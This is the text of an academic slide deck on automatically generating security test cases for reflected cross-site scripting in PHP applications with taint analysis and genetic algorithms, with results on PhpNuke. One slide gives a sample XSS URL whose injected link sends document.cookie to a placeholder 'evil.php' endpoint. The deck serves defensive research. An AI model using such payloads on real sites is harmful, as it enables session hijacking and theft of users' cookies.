You are on page 1of 30

Towards security testing with

taint analysis and genetic algorithms

Presented by Mariano Ceccato

[1] Andrea Avancini and Mariano Ceccato. Towards security testing with taint
analysis and genetic algorithms. In SESS 2010: Proceedings of the 2010 ICSE
Workshop on Software Engineering for Secure Systems, pages 65-71, New York,
NY, USA, 2010. ACM.
FBK- Foundation Bruno
Kessler
• FBK (more than 350 researchers)
is a research organization of the
Autonomous Province of Trento
that promotes research in the
areas of:
– science,
– technology and
– humanities

• FBK objectives are to:


– conduct research that obtains recognition at an international
level;
– carry out applied research of strategic importance to the
province;
– publicize scientific results and promote economic development;
and
– encourage innovation throughout the province.
2
FBK – CIT
• Center for Information Technology works mainly
in three areas:
– Engineering
– Content
– Interaction

3
Software Engineering unit
• Goal oriented requirements modeling
– Norm compliant requirements
– Requirements engineering for Adaptive Software systems
– Requirements formalization/prioritization
• Agent oriented software engineering
– Tropos
• Reverse engineering and re-engineering
– Automatic migration of legacy systems
– Reverse engineering of Object Oriented systems
• Testing
– Automatic test cases generation
– Testing of (Ajax) 2.0 Web Applications
– Testing of future internet applications
– Security testing of web applications

4
Unit at a glance
People
Tenured Postdoc PhD Progs Total
5 3 6 1 15
Projects active in 2010
Name Type Duration
IBT (Info. Bancaria Trentina) Industrial 2007-2011
A-cube (Ambient Aware Assistance) PAT 2008-2011
CERN (Code quality at Alice) Industrial 2010-2012
FITTEST (Future Internet Testing) EU-FP7 2010-2013
IoS (Internet of Services) JRP 2009-2013
L’architettura delle performance Ministero 2010-2013
5
About me
• In particular I work on:
– Security testing of web applications
– Empirical studies in software engineering
– Code transformation and re-engineering

6
Towards security testing with
taint analysis and genetic algorithms

Presented by Mariano Ceccato

[1] Andrea Avancini and Mariano Ceccato. Towards security testing with taint
analysis and genetic algorithms. In SESS 2010: Proceedings of the 2010 ICSE
Workshop on Software Engineering for Secure Systems, pages 65-71, New York,
NY, USA, 2010. ACM.
Security vulnerabilities
• Web applications are publicly exposed to a hostile environment
• Successful attacks may cause
– Sensitive information disclosure
– Revenue loss
• XXS is one of the most prominent security vulnerability

8
Current situation
• Methodologies to formalize access control and data
confidentiality (e.g. encryption)
• Approach for intrusion detection or vulnerability
identification on the network layer
• Lack of a mature/consolidated approach on the
application layer
– Often responsibility is delegated to “experts”
– Tools used only as starting point for manual investigation
– Adoption of firewall or monitors to block suspicious activity
(similar to an anti-virus)
• Annoying for users
• Blocking only known threats

9
Static analysis
• Valuable help for manual review, it provides
starting points (candidate vulnerabilities) for
manual review

• Limitations:
– Missing evaluation of dynamic constructs
(reflective calls, pointes, …)
– Conservative approach (false positives)
– Does not provides example, but just points where
to start looking at

10
The vision
• Taking advantage of testing-specific
methodologies for security testing
– Automatic generation of test cases
– Definition of “security adequate” test suite
– Definition of security oracle

11
Contributions
• Focus on XXS reflected vulnerabilities
• We resort on search-based software
engineering, using genetic algorithms
• Generation of (security) test cases for
candidate vulnerabilities identified by static
analysis
– Test cases demonstrate how security can be
broken, valuable support for maintainer
• Validation on a case study

12
XXS example

13
XXS example
<?PHP www.mysite.com?name=Mariano
$a = $_GET[ "name" ] ; Your name is: Mariano
echo “Your name is: “;
echo $a;
?>

www.mysite.com?name=<a href=""
onclick="this.href='evil.php?data='%2Bdocument.cookie">click here</a>

Your name is: click here evil.php?data=23333456fdd333

14
XXS on the CFG

1 $a = $_GET[ "first name" ] ; Tainted


2 $b = $_GET[ "surname" ] ; Tainted
3 if ( strpos ( $a , "<script” ) ) {
4 $a = htmlspecialchars ( $a ) ; Un-tainted
} ??
5 if ( isset ( $b ) )
6 $go_on_b = true ;
else
7 $go_on_b = false ;
8 if ( $go_on_b ) {
9 $b = htmlspecialchars ( $b ) ;
}
10 echo $a; Sink
11 if ( $go_on_b ) {
12 echo $b; Sink
}

15
Taint analysis

1 $a = $_GET[ "first name" ] ; Tainted


2 $b = $_GET[ "surname" ] ;
3 if ( strpos ( $a , "<script” ) ) {
4 $a = htmlspecialchars ( $a ) ; Skip
}
5 if ( isset ( $b ) )
6 $go_on_b = true ;
else
7 $go_on_b = false ;
8 if ( $go_on_b ) {
9 $b = htmlspecialchars ( $b ) ;
}
10 echo $a; Sink
11 if ( $go_on_b ) {
12 echo $b;
}

16
Taint analysis

1 $a = $_GET[ "first name" ] ;


2 $b = $_GET[ "surname" ] ; Tainted
3 if ( strpos ( $a , "<script” ) ) {
4 $a = htmlspecialchars ( $a ) ;
}
5 if ( isset ( $b ) )
6 $go_on_b = true ;
else
7 $go_on_b = false ;
8 if ( $go_on_b ) {
9 $b = htmlspecialchars ( $b ) ; Skip
}
10 echo $a;
11 if ( $go_on_b ) { Require
12 echo $b; Sink
}

17
False positive

1 $a = $_GET[ "first name" ] ;


2 $b = $_GET[ "surname" ] ;
3 if ( strpos ( $a , "<script” ) ) {
4 $a = htmlspecialchars ( $a ) ;
}
5 if ( isset ( $b ) )
6 $go_on_b = true ;
else
7 $go_on_b = false ;
8 if ( $go_on_b ) { $go_on_b == false
9 $b = htmlspecialchars ( $b ) ;
}
10 echo $a;
11 if ( $go_on_b ) { $go_on_b == true
12 echo $b;
}

18
Test case generation
• Taint analysis is a good starting point
– It provides candidate vulnerabilities
– It does not provide executable example
– False positives

• Generation of input values that make the execution traverse


the vulnerability
– Problem stated as search problem
– Too wide search space for a complete solution
– We don’t know the path to execute but just a subset of the
branches to traverse
– A search heuristic is more appropriate: Genetic algorithm

19
Genetic algorithms
• Individuals represent solution to the problem (tests)
• Input values are represented as chromosomes
• Fitness function to filter less suitable individuals and
preserve more suitable ones
• Recombination of more suitable individual for
generating a new population that is at least as fit as
the previous one
Initial
population

Fitness New
Crossover Mutation
calculation population

20
Fitness function
• Individual more near to the
solution are rewarded by a
higher value of fitness
function (they are more fit)
• Fitness function is approach
level:
– Number of the branches to
traverse in order to
execute/skip particular
statements

{ (a, Mariano), (b, Ceccato) }

http://mysite.com?a=Mariano&b=Ceccato
21
Crossover

{(firstname, john), (surname, smith), (age, 23)}

{(firstname, mark), (address, broadway), (job, teacher)}

{(firstname, john), (surname, smith), (job, teacher)}


{(firstname, mark), (address, broadway), (age, 23)}

22
Mutation

{(firstname, john), (surname, smith)

Add pair
Remove pair

{(firstname, john), (surname, smith), (age, 23)}

Change parameter
value
{(firstname, john), (surname, smithx3scr), (age, 23)}

{(firstname, john), (surname, xmith), (age, 23)}

23
Tool prototype

<?php Test case Genetic


Search
?>

Application under analysis

Static analysis • Evolution parameters:


– 70 individuals
Candidate – 500 generations
vulnerabilities – Prcrossover = 0.70
– Prmutation = 0.01

24
Sanity check with
random testing
• 50,000 test cases are generated for each vulnerability
• Random generation procedure:
– take a subset of the of the page parameters
– for each them, randomly generate a value in this way:
• Completely random
• Chose from a constant string from the application code
• We compute the approach level for each random test
• The maximum approach for each vulnerability is compared with
the one obtained with the genetic algorithm

• Case study: PhpNuke 6.9


– Open source CMS, 1046 files, 157 kloc

25
Experimental results

Vulnerability Target Genetic Random


Statements algorithm testing
confirmNewUser1 4 2 (50%) 1 (25%)
confirmNewUser2 4 2 (50%) 1 (25%)
confirmNewUser3 3 3 (100%) 1 (25%)
finishNewUser 4 2 (50%) 2 (50%)
userinfo 2 2 (100%) 1 (50%)
mail_password 5 5 (100%) 1 (20%)
userinfo 2 2 (100%) 2 (100%)
edithome 3 2 (67%) 2 (67%)
my_headline 5 2 (40%) 1 (20%)

26
Considerations
• We pass the sanity check of random testing
• If the algorithm converges, a solution is found in
less than 50 generations:
– Test cases are generated only for feasible paths
– When no solution is found either the path is infeasible
or the approach fails: manual analysis required
• Test cases trigger execution paths in which a
tainted variable is used in a sink
• A test case shows the way input data can skip
validation routines
• A test case does not exploit a vulnerability, but just
execute it.

27
Future works
• More advanced fitness functions (branch distance)
• More specific mutation operators and string
generation
– Based on syntax definition
– When strings represent date, numbers, enum…
• Integration of/comparison with concolic execution
• Generation of real attacks
• Further investigation on
– Persistent, DOM-based XSS
– SQL-injection
– CSRF

28
Conclusions
• Static analysis can be used to help manual
review (candidate vulnerable points)
• We combined it with genetic algorithms to
generate actual test cases (input values)
• Automatic test cases generation for
candidate vulnerabilities
– To show how vulnerabilities affect the code
• Implemented prototype applied on a real
PHP application

29
Questions?

30

You might also like